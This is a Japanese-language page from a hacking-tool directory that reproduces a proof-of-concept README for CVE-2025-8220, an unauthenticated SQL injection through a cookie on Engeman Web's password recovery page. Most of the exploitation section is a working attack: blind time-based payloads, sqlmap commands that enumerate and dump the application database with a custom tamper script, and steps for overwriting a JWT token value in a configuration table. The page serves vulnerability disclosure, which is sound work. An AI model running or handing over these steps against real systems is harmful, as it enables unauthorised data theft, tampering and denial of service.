Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
engeman-web-language-combobox-sqli — CVE-2025-8220に記載された脆弱性を悪用するための概念実証です。これは、Engeman Webソフトウェアのパスワード回復ページの読み込み中にSQLインジェクションが発生する可能性に関するものです。 | Kitploit
ツール/GitHubGitHub/m3m0o/engeman-web-language-combobox-sqli
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテストペイロード開発
GitHubm3m0o/engeman-web-language-combobox-sqli

engeman-web-language-combobox-sqli

CVE-2025-8220に記載された脆弱性を悪用するための概念実証です。これは、Engeman Webソフトウェアのパスワード回復ページの読み込み中にSQLインジェクションが発生する可能性に関するものです。

リポジトリを見る

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
310ヶ月前未レビュー

Engeman Web <= 12.0.0.2 パスワードリカバリページ読み込み時の認証不要SQLインジェクション

CVE-2025-8220 に記載されている脆弱性の悪用に関する概念実証です。これは Engeman Web ソフトウェアのパスワードリカバリページ読み込み中に SQLインジェクション が発生する可能性に関するものです。

説明

Engeman Web ソフトウェアにおいて、パスワードリカバリページの読み込み中に実行される SQL クエリを操作できる脆弱性が発見されました。この脆弱性は、有効な認証情報を一切持たない訪問者によっても、つまり認証なしの状態で悪用され、アプリケーションのデータベースに保存されているデータの機密性と完全性を損なうだけでなく、重要なテーブルの値を改変することでコンポーネントレベルでのサービス拒否を引き起こす可能性があります。

ベンダーウェブサイト

https://engeman.com/en/

悪用方法

アプリケーションにアクセスしてログインページにリダイレクトされたら、パスワードリカバリページにリダイレクトされるボタンをクリックします。

Engeman Web 初期ページ

Engeman Web パスワードリカバリページ

パスワードリカバリページを読み込むためにブラウザが送信したリクエストを確認します。初期アクセス時に保存された LanguageCombobox クッキーを含む、いくつかのクッキーが存在することに気付くでしょう。このデモでは、ブラウザのリクエストをより効率的に表示および再送信するために Burp Suite ソフトウェアを使用しました。

パスワードリカバリページのコンテンツを取得するために行われたリクエスト

脆弱性を確認するには、前述のクッキーの値として一重引用符を挿入し、リクエストを再送信します。アプリケーションの応答に、閉じられていない引用符を示すエラーが表示されるはずです。

LanguageCombobox クッキーの値に一重引用符を入れてアプリケーションにエラーを発生させる

クエリ結果は返されたページに直接表示されないため、これはブラインド型の悪用となります。' AND SLEEP(30)-- - や '; WAITFOR DELAY '0:0:30'-- などのペイロードを挿入して、基盤となるデータベースを推測できます。

時間ベースのペイロードによる基盤となるデータベースの種類の推測

インジェクションが確認されたら、sqlmap などの自動化ツールを使用してデータベースをダンプできます。

--technique 引数には SEB の値を含める必要があることに注意してください。これにより、スタッククエリ、エラー、 および ブール 比較に基づく手法が使用されます。第一に、ブラインド型の悪用が必要であるため、第二に、引数値から S オプションを省略すると、SQL Server データベースでインジェクションポイントを sqlmap が見つけられなかったためです。

root@kitploit:~
sqlmap -u https://<target>/Login/RecoveryPass --cookie 'LanguageCombobox=*' --level 5 --risk 3 --technique=SEB --batch

sqlmap を使用したインジェクションポイントのテスト

インジェクションポイントを通じて、さまざまな可能な悪用手法が特定されます。その後、データベース情報を取得できます。

root@kitploit:~
sqlmap -u https://<target>/Login/RecoveryPass --cookie 'LanguageCombobox=*' --level 5 --risk 3 --technique=SEB --batch --dbs

sqlmap による利用可能なデータベースの取得

root@kitploit:~
sqlmap -u https://<target>/Login/RecoveryPass --cookie 'LanguageCombobox=*' --level 5 --risk 3 --technique=SEB --batch -D Engeman --tables

sqlmap による利用可能なテーブルの取得

root@kitploit:~
sqlmap -u https://<target>/Login/RecoveryPass --cookie 'LanguageCombobox=*' --level 5 --risk 3 --technique=SEB --batch -D Engeman -T <table> --columns

sqlmap による利用可能なカラムの取得

sqlmap を使用してテーブルレコードをダンプするには、このリポジトリにある replace-dbo.py という名前のカスタムタンパースクリプトを使用する必要があります(少なくとも SQL Server データベースの場合)。その理由は、テーブルオブジェクトを参照する際に <database>.dbo.<table> 形式を使用する sqlmap ペイロードが、アプリケーションの処理と競合するためです。前述のタンパーは、それを <database>.<table> 形式のみに変換します。Engeman Web のインスタンスが MySQL または他のデータベースを使用している場合は、このタンパーは不要か、別のタンパーを作成する必要があります。

テーブルオブジェクトを参照するために <database>.dbo.<table> 形式のペイロードを試す

同じペイロードを今度は <database>.<table> 形式で試す

sqlmap ツールを使用するには、タンパースクリプトが配置されているディレクトリに init.py という名前の空のファイルが存在する必要があることに注意してください。タンパーをインストールのデフォルトのタンパーディレクトリに配置していない場合は、そのファイルが必要です。

root@kitploit:~
sqlmap -u https://<target>/Login/RecoveryPass --cookie 'LanguageCombobox=*' --level 5 --risk 3 --technique=SEB --batch -D Engeman -T <table> --dump --tamper <tamper-file>.py

アプリケーションの一般設定の取得

このタンパーは、特定のテーブルのダンプ以外のプロセスのどの段階で使用しても競合を引き起こします。したがって、データベース (--dbs)、 テーブル (--tables)、 カラム (--columns)、 またはデータベースユーザー (--current-user) などの追加情報を取得するためには使用しないでください。

アプリケーションがデータベースとやり取りするために使用するユーザーは、システムレコードのコンテキスト内で高い権限を持つため、基盤となるクエリを操作してテーブルレコードの値を変更することも可能です(これは、インスタンスが基盤となるデータベースとして SQL Server を使用している場合にはるかに簡単です)。

CFGGERAL テーブルの一意エントリの JWTVALIDOTOKEN カラムの初期値

JWTVALIDOTOKEN エントリカラムの値の変更

CFGGERAL テーブルの一意エントリの JWTVALIDOTOKEN カラムの変更後の値

影響

この脆弱性により、システムの任意のインスタンスが、使用中のデータベースに存在するデータの不正な取得、および場合によっては改変に対して影響を受けやすくなります。

この脆弱性は 12.0.0.1 までのバージョンで確認されましたが、より新しいバージョンもおそらく影響を受ける可能性があります。

ツールをダウンロード